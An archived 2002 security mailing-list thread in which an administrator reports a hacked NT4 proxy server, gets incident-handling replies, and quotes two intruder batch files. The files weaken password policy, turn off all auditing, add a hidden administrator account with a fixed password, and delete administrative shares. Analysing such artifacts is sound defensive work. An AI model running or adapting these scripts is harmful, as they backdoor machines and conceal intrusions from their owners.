Security Incidents mailing list archives
RE: Proxy server hit... Any ideas?
From: "darroch royden" <darroch.royden () blueyonder co uk>
Date: Wed, 20 Nov 2002 12:34:27 -0000
A favourite tool is xscan (xfocus.org), which among other options/plugins you can choose ntpass which brute forces bad passwords on the remote machine. I would imagine, especially since they are removing the hidden shares that this is how they penetrated the machine. Hope this helps. -----Original Message----- From: Mike Cain [mailto:mikec () lpinsurance com] Sent: 19 November 2002 9:29 PM To: incidents () securityfocus com Subject: RE: Proxy server hit... Any ideas? I was really more looking for suggestions on 'how' the guy got in, and if it matched any known exploits. First off, I didn't build the box, and it wasn't my responsibility until about 3 weeks ago. Secondly, I do know a good bit about hardening a box, so I am in the process of rebuilding the Proxy to my specs (No FTP is DEFINITELY one of them since this company doesn't use FTP). Thanks for the help though.... such as it was... Mike Cain -----Original Message----- From: Russell Harding [mailto:hardingr () cunap com] Sent: Tuesday, November 19, 2002 3:04 PM To: Mike Cain Cc: incidents () securityfocus com Subject: Re: Proxy server hit... Any ideas? Mike, It seems like you've been gotten one of the many so called 'hackers' who troll the internet looking for unpatched NT boxen to use as rogue FTP (music/warez/movie) servers. The incidents list sees this sort of post about once a week... "I run NT, don't know security and got hit...what did I get?" I could be just another person to direct you to the same sources the list always does (netstat, fport, etc...) But I would like to recommend the following: With an unknown backdoor installed on your system, you really can never know if you've eradicated the intruder. It is best to not really worry about what is there (keep the 'pirates booty' if you wish :) ) But focus on what to do about it. You need to re-format your drive, start from scratch with the machine _off_ the public internet until it is fully patched. Don't always trust windows update to keep you patched... It may help you to use a third party utility. Good luck rebuilding your system, -Russell On Mon, 18 Nov 2002, Mike Cain wrote:
Well, I have had my first run-in with a hacker, or was it a virus? I'm
not 100% sure.. Guess I should start from the beginning... A days ago, I began to get user complaints on the slowness of the internet. I figured it was mostly them just wanting something to complain about, so I did what all crappy admins do, I ignored it.
Well,
last night the box was rebooted after some software was updated. Today
people were complaining about how PAINFULLY slow the internet was, so
I
looked at the proxy server. NT4 running proxy3. I know, there is newer
better stuff, but its what I have to work with. :) SO... I looked at
the
processes and noticed the CPU hovering at 35-50%.. Way too high. So a quick look at the process list showed two things that I didn't
remember
needing to be there, win.exe and start.exe. Next move was to find
them,
and they were in the winnt\system\ folder. What I also found odd was that there were three new folders in that directory all created on the
8th, NT, tools, and win. Here are the contents, respectively. 1. 1fg.dll, 1gno32.dll, 1s.dll, 1t.exe(antivirus sees this one as a backdoor Trojan), 132.dll, 1gn32.dll, 1idv32.dll, 1sf32.dll,
1ygwin1.dll
(says it's a Cygwin POSIX Emulation DLL), 132.dll.bkup 2. temp, servUDaemon.ini, services.exe, servUStartUpLog.txt, in, srvss.exe, start.exe, BugSlayerUtil.dll (says it's a Bugslayer Utility
Routine), and _zoLibr.dll 3. (folder) FL, cygwin.dll, MS.dll, secure.bat (see below), temp, x32.dll, cfg.dll, IGNo32.dll, secure1.bat (see below) pidv32.dll, win.exe, x32.dll.bkup SO, anyone know what I have or what hit me? From looking at the
sercure
and secure1 batch files, it looks like a root kit... But I'mm new at this side of security I'mm aCiscoo guy...) Last thing, the logs show that the attacker was hitting the \scripts\sample\ folder... Meaning I think he was trying to use the
old
IIS Sample Scripts to execute local code... Not sure if he was successful... Thanks in advance!! Mike Cain CCNP/MCSE Secure.bat = @echo off del temp echo Compiling New Security Policy ... echo [Version] >> temp echo signature="$CHICAGO$" >> temp echo Revision=1 >> temp echo [Profile Description] >> temp echo Description=Default Security Settings. (Windows 2000
Professional)
tempecho [System Access] >> temp echo MinimumPasswordAge = 0 >> temp echo MaximumPasswordAge = 42 >> temp echo MinimumPasswordLength = 0 >> temp echo PasswordComplexity = 0 >> temp echo PasswordHistorySize = 0 >> temp echo LockoutBadCount = 0 >> temp echo RequireLogonToChangePassword = 0 >> temp echo ClearTextPassword = 0 >> temp echo [Event Audit] >> temp echo AuditSystemEvents = 0 >> temp echo AuditLogonEvents = 0 >> temp echo AuditObjectAccess = 0 >> temp echo AuditPrivilegeUse = 0 >> temp echo AuditPolicyChange = 0 >> temp echo AuditAccountManage = 0 >> temp echo AuditProcessTracking = 0 >> temp echo AuditDSAccess = 0 >> temp echo AuditAccountLogon = 0 >> temp echo [Registry Values] >> temp echo
machine\system\currentcontrolset\services\netlogon\parameters\signsecure
channel=4,1 >> temp echo
machine\system\currentcontrolset\services\netlogon\parameters\sealsecure
channel=4,1 >> temp echo
machine\system\currentcontrolset\services\netlogon\parameters\requirestr
ongkey=4,0 >> temp echo
machine\system\currentcontrolset\services\netlogon\parameters\requiresig
norseal=4,0 >> temp echo
machine\system\currentcontrolset\services\netlogon\parameters\disablepas
swordchange=4,0 >> temp echo
machine\system\currentcontrolset\services\lanmanworkstation\parameters\r
equiresecuritysignature=4,0 >> temp echo
machine\system\currentcontrolset\services\lanmanworkstation\parameters\e
nablesecuritysignature=4,1 >> temp echo
machine\system\currentcontrolset\services\lanmanworkstation\parameters\e
nableplaintextpassword=4,0 >> temp echo
machine\system\currentcontrolset\services\lanmanserver\parameters\requir
esecuritysignature=4,0 >> temp echo
machine\system\currentcontrolset\services\lanmanserver\parameters\enable
securitysignature=4,0 >> temp echo
machine\system\currentcontrolset\services\lanmanserver\parameters\enable
forcedlogoff=4,1 >> temp echo
machine\system\currentcontrolset\services\lanmanserver\parameters\autodi
sconnect=4,15 >> temp echo machine\system\currentcontrolset\control\session manager\protectionmode=4,1 >> temp echo machine\system\currentcontrolset\control\session manager\memory management\clearpagefileatshutdown=4,0 >> temp echo machine\system\currentcontrolset\control\print\providers\lanman print services\servers\addprinterdrivers=4,0 >> temp echo
machine\system\currentcontrolset\control\lsa\restrictanonymous=4,0
tempecho machine\system\currentcontrolset\control\lsa\lmcompatibilitylevel=4,0temp echo machine\system\currentcontrolset\control\lsa\fullprivilegeauditing=3,0tempecho machine\system\currentcontrolset\control\lsa\crashonauditfail=4,0tempecho machine\system\currentcontrolset\control\lsa\auditbaseobjects=4,0tempecho
machine\software\microsoft\windows\currentversion\policies\system\shutdo
wnwithoutlogon=4,1 >> temp echo
machine\software\microsoft\windows\currentversion\policies\system\legaln
oticetext=1, >> temp echo
machine\software\microsoft\windows\currentversion\policies\system\legaln
oticecaption=1, >> temp echo
machine\software\microsoft\windows\currentversion\policies\system\dontdi
splaylastusername=4,0 >> temp echo machine\software\microsoft\windows nt\currentversion\winlogon\scremoveoption=1,0 >> temp echo machine\software\microsoft\windows nt\currentversion\winlogon\passwordexpirywarning=4,14 >> temp echo machine\software\microsoft\windows nt\currentversion\winlogon\cachedlogonscount=1,10 >> temp echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatefloppies=1,0 >> temp echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatedasd=1,0 >> temp echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatecdroms=1,0 >> temp echo machine\software\microsoft\windows nt\currentversion\setup\recoveryconsole\setcommand=4,0 >> temp echo machine\software\microsoft\windows nt\currentversion\setup\recoveryconsole\securitylevel=4,0 >> temp echo
[Privilege Rights] >> temp echo seassignprimarytokenprivilege = >> temp echo seauditprivilege = >> temp echo sebackupprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp echo sebatchlogonright = >> temp echo sechangenotifyprivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-1-0 >>
temp
echo secreatepagefileprivilege = *S-1-5-32-544 >> temp echo secreatepermanentprivilege = >> temp echo secreatetokenprivilege = >> temp echo sedebugprivilege = *S-1-5-32-544 >> temp echo sedenybatchlogonright = >> temp echo sedenyinteractivelogonright = >> temp echo sedenynetworklogonright = >> temp echo sedenyservicelogonright = >> temp echo seenabledelegationprivilege = >> temp echo seincreasebasepriorityprivilege = *S-1-5-32-544 >> temp echo seincreasequotaprivilege = *S-1-5-32-544 >> temp echo seinteractivelogonright =
*S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-5-21-196040
8961-1637723038-1801674531-501 >> temp echo seloaddriverprivilege = *S-1-5-32-544 >> temp echo selockmemoryprivilege = >> temp echo semachineaccountprivilege = >> temp echo senetworklogonright = %1 >> temp echo seprofilesingleprocessprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp echo seremoteshutdownprivilege = *S-1-5-32-544 >> temp echo serestoreprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp echo sesecurityprivilege = *S-1-5-32-544 >> temp echo seservicelogonright = >> temp echo seshutdownprivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545 >> temp echo sesyncagentprivilege = >> temp echo sesystemenvironmentprivilege = *S-1-5-32-544 >> temp echo sesystemprofileprivilege = *S-1-5-32-544 >> temp echo sesystemtimeprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp echo setakeownershipprivilege = *S-1-5-32-544 >> temp echo setcbprivilege = >> temp echo seundockprivilege = *S-1-5-32-544,*S-1-5-32-547,*S-1-5-32-545 >> temp echo Adding User %1 with the Password %2 ... net user /add slash 971985 echo Adding slash to the Local Administrator Group ... net localgroup administrators slash /add echo Loading New Security Policy ... secedit.exe /configure /areas USER_RIGHTS /db C:\winnt\temp\temp.mdb /CFG temp echo System is now secure. Secure1.bat net share /delete C$ /y > net.deld net share /delete D$ /y >> net.deld net share /delete E$ /y >> net.deld net share /delete F$ /y >> net.deld net share /delete G$ /y >> net.deld net share /delete H$ /y >> net.deld net share /delete I$ /y >> net.deld net share /delete J$ /y >> net.deld net share /delete K$ /y >> net.deld net share /delete L$ /y >> net.deld net share /delete M$ /y >> net.deld net share /delete N$ /y >> net.deld net share /delete O$ /y >> net.deld net share /delete P$ /y >> net.deld net share /delete Q$ /y >> net.deld net share /delete R$ /y >> net.deld net share /delete S$ /y >> net.deld net share /delete T$ /y >> net.deld net share /delete U$ /y >> net.deld net share /delete V$ /y >> net.deld net share /delete W$ /y >> net.deld net share /delete X$ /y >> net.deld net share /delete Y$ /y >> net.deld net share /delete Z$ /y >> net.deld net share /delete ADMIN$ /y >> net.deld #net share /delete IPC$ /y >> net.deld del net.deld
------------------------------------------------------------------------ ----
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
------------------------------------------------------------------------ ---- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- Proxy server hit... Any ideas? Mike Cain (Nov 19)
- Re: Proxy server hit... Any ideas? Hugo van der Kooij (Nov 20)
- RE: Proxy server hit... Any ideas? ZeroBreak (Nov 22)
- Re: Proxy server hit... Any ideas? Russell Harding (Nov 22)
- RE: Proxy server hit... Any ideas? Mike Cain (Nov 20)
- RE: Proxy server hit... Any ideas? darroch royden (Nov 21)
- Re: Proxy server hit... Any ideas? Valdis . Kletnieks (Nov 21)
- Re: Proxy server hit... Any ideas? Emeric Miszti (Nov 23)
- Re: Proxy server hit... Any ideas? Valdis . Kletnieks (Nov 24)
- Message not available
- Re: Proxy server hit... Any ideas? Valdis . Kletnieks (Nov 25)
- RE: Proxy server hit... Any ideas? Mike Cain (Nov 20)
- <Possible follow-ups>
- RE: Proxy server hit... Any ideas? Othenin-Girard Pascal (Nov 21)
- RE: Proxy server hit... Any ideas? Mike Cain (Nov 22)
- RE: Proxy server hit... Any ideas? Alvin Oga (Nov 25)
- RE: Proxy server hit... Any ideas? Captain James T Kirk (Nov 25)
- Re: Proxy server hit... Any ideas? Etaoin Shrdlu (Nov 25)
- RE: Proxy server hit... Any ideas? Jonathan Bloomquist (Nov 25)